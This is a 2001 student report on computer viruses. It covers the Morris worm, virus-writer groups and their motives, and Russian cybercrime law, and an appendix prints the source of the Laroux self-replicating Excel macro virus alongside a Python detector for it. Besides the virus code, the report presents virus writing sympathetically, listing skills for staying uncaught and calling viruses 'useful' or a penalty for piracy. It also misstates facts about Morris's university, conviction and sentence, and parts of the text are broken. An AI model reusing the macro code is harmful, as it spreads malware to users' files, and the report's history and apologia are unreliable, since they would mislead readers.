Computer viruses

Chuvash State University

Economic faculty

Report

COMPUTER VIRUSES

Author:

student of EC-13-98

Eugene Ivanov

Cheboxary – 2001

CONTENTS

A bit of history

What is a computer virus?

Who writes computer viruses?

To whose advantage computer viruses are written?

A legal notice. Penal Code of Russian Federation

Synopsis

SOURCES

Appendix

A bit of history

On 2 November 1988 Robert Morris Jr., a graduate student of the informatics faculty of Cornwall University (USA), infected a great number of computers connected to the Internet. This network unites machines of university centres, private companies and government agencies, including the National Aeronautics and Space Administration, as well as some military research centres and labs.

The network worm struck 6200 machines, which made up 7.3% of the computers on the network, and showed that UNIX is not safe either. Among those damaged were NASA, Los Alamos National Lab, the exploratory centre VMS USA, the California Technology Institute and Wisconsin University (200 out of 300 systems). Spreading over the Arpanet, Milnet, Science Internet and NSF Net networks, it practically put them out of action. According to the Wall Street Journal, the virus infiltrated networks in Europe and Australia, where cases of blocked computers were also registered.

Here are some recollections of participants in the event:

Symptom: hundreds or thousands of jobs start running on a Unix system

bringing response to zero.

Systems attacked: Unix systems, 4.3BSD Unix & variants (e.g.: SUNs) any

sendmail compiled with debug has this problem. This virus is spreading very

quickly over the Milnet. Within the past 4 hours, it has hit >10 sites

across the country, both Arpanet and Milnet sites. Well over 50 sites have

been hit. Most of these are "major" sites and gateways.

Method: Someone has written a program that uses a hole in SMTP Sendmail

utility. This utility can send a message into another program.

Apparently what the attacker did was this: he or she connected to

sendmail (i.e., telnet victim.machine 25), issued the appropriate debug

command, and had a small C program compiled. (We have it. Big deal.) This

program took as an argument a host number, and copied two programs – one

ending in VAX.OS and the other ending in SunOS – and tried to load and

execute them. In those cases where the load and execution succeeded, the

worm did two things (at least): spawn a lot of shells that did nothing but

clog the process table and burn CPU cycles; look in two places – the

password file and the internet services file – for other sites it could

connect to (this is hearsay, but I don't doubt it for a minute). It used

both individual .host files (which it found using the password file), and

any other remote hosts it could locate which it had a chance of connecting

to. It may have done more; one of our machines had a changed superuser

password, but because of other factors we're not sure this worm did it.

All of Vaxen and some of Suns here were infected with the virus. The

virus forks repeated copies of itself as it tries to spread itself, and the

load averages on the infected machines skyrocketed. In fact, it got to the

point that some of the machines ran out of swap space and kernel table

entries, preventing login to even see what was going on!

The virus also "cleans" up after itself. If you reboot an infected

machine (or it crashes), the /tmp directory is normally cleaned up on

reboot. The other incriminating files were already deleted by the virus

itself.

On 4 November the author of the virus, Morris, came to FBI headquarters in Washington on his own. The FBI imposed a prohibition on all material relating to the Morris virus.

On 22 January 1989 a jury found Morris guilty. If the guilty verdict had been approved without modification, Morris would have been sentenced to 5 years in prison and a fine of 250 000 dollars. However, Morris' attorney Thomas Guidoboni immediately lodged a protest and sent all the papers to the Circuit Court with a petition to overturn the court's decision... Finally Morris was sentenced to 3 months in prison and a fine of 270 thousand dollars, and in addition Cornwall University suffered a heavy loss, having expelled Morris. The author then had to take part in the liquidation of his own creation.

What is a computer virus?

It is executable code able to reproduce itself. Viruses are an area of pure programming and, unlike other computer programs, carry intelligent functions for protection against being found and destroyed. They have to fight for survival in the complex conditions of conflicting computer systems. That is why they evolve as if they were alive.

Yes, viruses seem to be the only living organisms in the computer environment, and their main goal is survival. That is why they may have complex encryption/decryption engines, which are indeed a sort of standard for computer viruses nowadays, in order to carry out the processes of duplication, adaptation and disguise.

It is necessary to differentiate between reproducing programs and Trojan horses. Reproducing programs will not necessarily harm your system, because they are aimed at producing as many copies (or near-copies) of themselves as possible, either by means of so-called agent programs or without their help. In the latter case they are referred to as "worms".

Meanwhile, Trojan horses are programs aimed at causing harm or damage to PCs. Certainly it is common practice for them to be part of a "tech-organism", but they have completely different functions.

That is an important point. Destructive actions are not an integral part of the virus by default. However, virus writers allow the presence of destructive mechanisms as active protection against their creations being found and destroyed, as well as a response to society's attitude to viruses and their authors.

As you see, there are different types of viruses, and they have already

been separated into >

harmless, and very dangerous. No destruction means a harmless one, tricks

with system halts means a dangerous one, and finally with a devastating

destruction means a very dangerous virus.

But viruses are famous not only for their destructive actions, but also

for their special effects, which are almost impossible to >

virus-writers suggest the following:

funny, very funny and sad or melancholy (keeps silence and infects). But

one should remember that special effects must occur only after a certain

number of contaminations. Users should also be given a chance to restrict

execution of destructive actions, such as deleting files or formatting hard disks. Thereby a virus can be considered a useful program, keeping a check on system changes and preventing surprises such as the deletion of files or the wiping of hard disks.

It sounds quite heretical to say such words about viruses, which are usually considered to be a disaster. The less a person understands about programming and virology, the greater the influence the possibility of being infected with a virus will have on him. Thus, let us consider the creators of viruses as the best source.

Who writes computer viruses?

They are lone wolves or groups of programmers.

Although a lot of people think that writing a computer virus is hard, this is not exactly so. Using special programs called "Virus creators", even beginners in the computer world can build their own viruses, which will be a strain of a certain major virus. This is precisely the case with the notorious virus "Anna Kournikova", which is actually a worm. The aim of creating viruses in this way is pretty obvious: the author wants to become well known all over the world and to show his powers. However, the results of the attempt can be very sad (see "A bit of history"); only real professionals can become famous and stay uncaught. A good example is Dark Avenger. Yes, and it is yet another custom of participants of "the scene" to take terrifying monikers (nicknames).

To write something really new and remarkable, a programmer should have some extra knowledge and skills, for example:

1) good strategic thinking and intuition: once released, a virus and its descendants live their own independent lives in nearly unpredictable conditions, so the author must anticipate a lot of things;

2) splendid knowledge of the Assembler[1] language and of the operating system he writes for: the more mistakes there are in the virus, the quicker it will be caught;

3) attention to detail and the skill to solve the most varied tactical questions: one won't write a compact, satisfactorily working program without these abilities;

4) high professional discipline, in order to join the preceding points together.

A computer virus group is an informal non-profit organisation uniting programmers who author viruses, regardless of their qualifications. Anyone can become a member of the club if he creates viruses or studies them for the purpose of creating and spreading them.

The aims they pursue together may differ from those of a single virus writer, although they usually also try to become as famous as possible. At the same time they may help beginning programmers in the field of viruses and spread commented virus sources and descriptions of virus algorithms.

One can't say that all of the group members write viruses in Assembler. Actually, you don't have to know any computer language or write any program code to become a member or a friend of the group. But programming in Assembler is preferred; Pascal, C++ and other high-level languages are considered to be humiliating. It does make sense, since programs written in Assembler are much smaller (0.5-5 kb) and therefore more robust. On the other hand, Assembler is quite difficult to understand, especially for beginners. One should think the way the computer does: all commands are sent directly to the central processing unit of the PC.

There are computer virus groups all over the world, a few being more successful than others. It may be pretty hard to get in contact with them, since they are quite typical representatives of the computer underground world, as are (free)wares groups. Sometimes, however, creating viruses can become a respectable occupation, bringing a constant income. After all, no one but the author of the virus can provide valuable information on the way it should be treated and cured.

To whose advantage computer viruses are written?

Copyleft (cl) is the distribution of programs without registering the software, i.e. using a cracked copy. The practice is widely used in the territory of the former USSR, even by medium and big companies, to say nothing of ordinary users. This software is stolen, which involves criminal responsibility (see legal notice). One of the general values of our culture is generosity, and you can't do anything about it. But at least freeware lovers should know that continuing the practice could be risky. That is the first use of computer viruses: as a sort of compensation to software developers.

In the very same way, writing viruses usually does not bring profit to the author, at least when the authors of a virus and of the cure for it are different people. The situation is quite different when they are not, especially if the person manages to hide the fact of the double-dealing. And that is the second advantage of computer viruses.

Yes, developers of antiviral software make money from selling their remedy for a new virus widely hyped by the mass media. Agitation can grow so strong that all and sundry dash to buy antiviral protection against even the most harmless virus. The usual behaviour of share indexes on stock exchanges during a computer virus epidemic is to fall. However, the shares of such companies as Symantec (which is famous for its Norton Antivirus) will soar up to the sky.

This tendency is especially significant in the world of the emerging New Economy. This fancy term means an economy based on computer services as the engine of development. The system exists in the United States. That is why we hardly ever hear the names of Dow Jones and Standard & Poor's in the mass media nowadays. Their place is occupied by the NASDAQ Composite index, based on the National Association of Securities Dealers Automated Quotations system. The index reflects the performance of high-tech companies, the base of the New Economy.

We can't say for sure, but maybe in the near future the index will be influenced more by computers themselves than by brokers and dealers on the world's stock exchanges. IBM Corporation has recently presented its new invention, an automated broker, which is in fact a mainframe (a very big computer) with specialised software. It is a descendant of the mainframe DeepBlue, well known for its skill at chess. Unfortunately, it seems that bad times have come for the whole economy of the USA, which also means problems for NASDAQ.

Nevertheless, the initiative of IBM should certainly be welcomed. Automated brokers seem to understand the volatility of indexes in a much quicker and more rational way than human beings. There is only one drawback to eliminate: the problem of artificial intelligence. A machine can't think as a human does.

Maybe computer viruses could be of some use here too. After all, the flights to the Moon were simply a side effect of inventing new ways of exterminating the civilian population during the Second World War (ballistic rockets). A wish to kill people made a fantastic daydream become reality within fifty years. The first computing machine was actively used during the development of the first atomic bomb. So sometimes even very bad things, much more dangerous than viruses (name at least one person who has been the victim of a cruel computer virus), can greatly assist progress and bring a greater profit.

A legal notice. Penal Code of Russian Federation

Chapter 28. Crimes in sphere of computer information

Article 272. Illegitimate access to computer information

1. Illegitimate access to legally protected computer information, i.e. information on a machine carrier, in an electronic computing machine (PC), a PC system or its network, if it causes the destruction, blocking, modification or copying of information, or disruption of the operation of a PC, PC system or its network, –

is punished by a fine of two to five hundred minimum wages, or in the amount of the salary or other income of the convicted person for a period from two to five months, or by corrective works for a period from six months to one year, or by deprivation of liberty for a term of up to two years.

2. The same deed, committed by a group of persons by prior collusion or by an organised group, or by a person using their official position or having access to a PC, PC system or its network, –

is punished by a fine of five to eight hundred minimum wages, or in the amount of the salary or other income of the convicted person for a period from five to eight months, or by corrective works for a period from one to two years, or by arrest for a period from three to six months, or by deprivation of liberty for a term of up to two years.

Article 273. Creation, use and spreading of harmful programs for PC

1. Creating programs for PC or introducing changes into existing programs, undoubtedly bringing about unauthorised deletion, blocking, modification or copying of information, or disruption of the operation of a PC, PC system or its network, as well as the use or spreading of such programs or of machine carriers with such programs, –

is punished by deprivation of liberty for a term of up to three years with a fine of two to five hundred minimum wages, or in the amount of the salary or other income of the convicted person for a period from two to five months.

2. The same deeds, having caused grave consequences through negligence, –

are punished by deprivation of liberty for a term from three to seven years.

Synopsis

The history of computer viruses began recently, but it has already become legendary. Almost everyone knows a few awesome fables about these creatures, but hardly anyone understands what a computer virus is.

A computer virus is executable code able to reproduce itself. Viruses are an area of pure programming and, unlike other computer programs, carry intelligent functions for protection against being found and destroyed. They have to fight for survival in the complex conditions of conflicting computer systems.

Viruses seem to be the only living organisms in the computer environment, and their main goal is survival. That is why they may have complex encryption/decryption engines, which are indeed a sort of standard for computer viruses nowadays, in order to carry out the processes of duplication, adaptation and disguise.

Viruses are written by lone wolves or groups of programmers.

Using special programs called "Virus creators", even beginners in the computer world can build their own viruses. The aim of creating viruses in this way is pretty obvious: the author wants to become well known all over the world and to show his powers.

The results of the attempt can be very sad; only real professionals can become famous and stay uncaught. To write something really new and remarkable, a programmer should have some extra knowledge and skills.

A computer virus group is an informal non-profit organisation uniting programmers who author viruses, regardless of their qualifications. Anyone can become a member of the club if he creates viruses or studies them for the purpose of creating and spreading them. You don't have to know any computer language or write any program code to become a member or a friend of the group. Programming in Assembler is preferred; Pascal, C++ and other high-level languages are considered to be humiliating.

There are computer virus groups all over the world, a few being more successful than others. It may be pretty hard to get in contact with them, since they are quite typical representatives of the computer underground world, as are (free)wares groups. Sometimes, however, creating viruses can become a respectable occupation, bringing a constant income. After all, no one but the author of the virus can provide valuable information on the way it should be treated and cured.

Developers of antiviral software make money from selling their remedy for a new virus widely hyped by the mass media. Agitation can grow so strong that all and sundry dash to buy antiviral protection against even the most harmless virus. The usual behaviour of share indexes on stock exchanges during a computer virus epidemic is to fall. However, the shares of high-tech companies producing antiviral software will soar up to the sky.

An epidemic of foot-and-mouth disease has overwhelmed Europe in these days (March 15, 2001). It seems that a vast economic crisis is breaking out in America. World finances do their best to escape the worst.

A breakthrough in the development of artificial intelligence could prevent NASDAQ from collapsing completely. The help may come from an unexpected side...

But don't forget that the creation, use and spreading of harmful programs for PC is a criminal offence, as is using cracked versions of programs. Our penal code establishes a punishment of up to seven years in jail.

And be aware that computer viruses have come to stay for a long time, if not forever.

SOURCES

1. Penal Code of Russian Federation

2. Handless N.N. Computer virology. Part 1: General principles of

operation, categorization and catalogue of the most widespread viruses in

operating system MS DOS. – Kiev, 1990.

3. Infected Voice. Issue 1, September, 1994. – STEALTH group.

4. Infected Voice. Issue 2, October, 1994. – STEALTH group.

5. Infected Voice. Issue 3, December, 1994. – STEALTH group.

Appendix

A fragment of a macro virus (Laroux), written in a high-level computer language (Excel Visual Basic)

Attribute VB_Name = "laroux"

Sub auto_open()

Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"

Application.OnSheetActivate = "check_files"

End Sub

Sub check_files()

Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"

c$ = Application.StartupPath

m$ = Dir(c$ & "\" & "PERSONAL.XLS")

If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0

If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0

whichfile = p + w * 10

Select Case whichfile

Case 10

Application.ScreenUpdating = False

n4$ = ActiveWorkbook.Name

Sheets("laroux").Visible = True

Sheets("laroux").Select

Sheets("laroux").Copy

With ActiveWorkbook

.Title = ""

.Subject = ""

.Author = ""

.Keywords = ""

.Comments = ""

End With

newname$ = ActiveWorkbook.Name

c4$ = CurDir()

ChDir Application.StartupPath

ActiveWindow.Visible = False

Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" &

"PERSONAL.XLS", FileFormat:=xlNormal _

, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _

False, CreateBackup:=False

ChDir c4$

Workbooks(n4$).Sheets("laroux").Visible = False

Application.OnSheetActivate = ""

Application.ScreenUpdating = True

Application.OnSheetActivate = "personal.xls!check_files"

Case 1

Application.ScreenUpdating = False

n4$ = ActiveWorkbook.Name

p4$ = ActiveWorkbook.Path

s$ = Workbooks(n4$).Sheets(1).Name

If s$ <> "laroux" Then

Workbooks("PERSONAL.XLS").Sheets("laroux").Copy

before:=Workbooks(n4$).Sheets(1)

Workbooks(n4$).Sheets("laroux").Visible = False

Else

End If

Application.OnSheetActivate = ""

Application.ScreenUpdating = True

Application.OnSheetActivate = "personal.xls!check_files"

Case Else

End Select

End Sub
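
The traits visible in the Laroux fragment above (an auto_open entry point, an OnSheetActivate hook, a workbook saved as PERSONAL.XLS in the startup path, a sheet copied into other workbooks) can be checked for statically in exported macro text. The Python code below is an added example, not part of the original report; the rule names, roles, verdict strings and both samples are constructed for illustration.

```python
import re

IC = re.IGNORECASE
# (rule name, role, pattern). Names and roles are constructed for this example;
# each pattern mirrors a statement visible in the fragment above.
RULES = [
    ("auto_exec_entry", "trigger",
     re.compile(r"^\s*Sub\s+auto_open\s*\(", IC | re.M)),
    # Only a non-empty handler counts; assigning "" clears the hook.
    ("event_hook", "trigger",
     re.compile(r'Application\.OnSheetActivate\s*=\s*"[^"]+"', IC)),
    ("startup_workbook_write", "persist",
     re.compile(r"\.SaveAs\b[^\n]*StartupPath[^\n]*PERSONAL\.XLS", IC)),
    ("sheet_copy_to_workbook", "spread",
     re.compile(r"\.Sheets\([^)]*\)\.Copy\b[^\n]*(?:before|after):=\s*Workbooks\(", IC)),
    ("hides_ui", "stealth",
     re.compile(r"(?:\.Visible|ScreenUpdating)\s*=\s*False", IC)),
    ("blanks_properties", "stealth",
     re.compile(r'\.(?:Title|Subject|Author|Keywords|Comments)\s*=\s*""', IC)),
]

def normalize(source):
    """Join VBA line continuations and drop apostrophe comments."""
    joined = re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", source)
    lines = []
    for line in joined.splitlines():
        in_string = False
        for pos, ch in enumerate(line):
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                line = line[:pos]  # the rest of the line is a comment
                break
        lines.append(line)
    return "\n".join(lines)

def scan(source):
    """Return the matched rule names and a verdict for exported macro text."""
    text = normalize(source)
    hits = [(name, role) for name, role, rx in RULES if rx.search(text)]
    roles = {role for _, role in hits}
    if "trigger" in roles and roles & {"persist", "spread"}:
        verdict = "self-replicating pattern"
    else:
        verdict = "review" if hits else "clean"
    return {"verdict": verdict, "rules": [name for name, _ in hits]}

# Constructed samples (not taken from any real workbook).
SUSPECT = r'''Sub auto_open()
    Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
    Workbooks(n$).SaveAs FileName:=Application.StartupPath & "\" & _
        "PERSONAL.XLS"
End Sub'''
BENIGN = r'''Sub auto_open()
    ' Application.OnSheetActivate = "check_files"
End Sub'''

if __name__ == "__main__":
    print(scan(SUSPECT), scan(BENIGN), sep="\n")
```

A trigger alone (an auto_open that does nothing else) is only marked for review; the stronger verdict requires a trigger together with a persistence or spreading step, which is the combination the fragment shows.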

-----------------------

[1] Assembler - a low-level, hardware-oriented computer language